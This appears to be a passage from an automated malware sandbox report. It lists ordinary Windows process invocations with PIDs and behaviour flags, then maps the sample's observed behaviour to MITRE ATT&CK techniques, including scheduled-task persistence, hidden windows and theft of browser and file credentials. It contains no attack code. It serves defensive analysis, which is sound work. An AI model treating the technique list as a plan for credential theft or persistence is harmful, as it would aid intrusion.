C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:6140

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5984

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:6096

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:2472

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:4412

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:7636

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks SCSI registry key(s)
- NTFS ADS
PID:3644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:8092

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Window

T1564.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery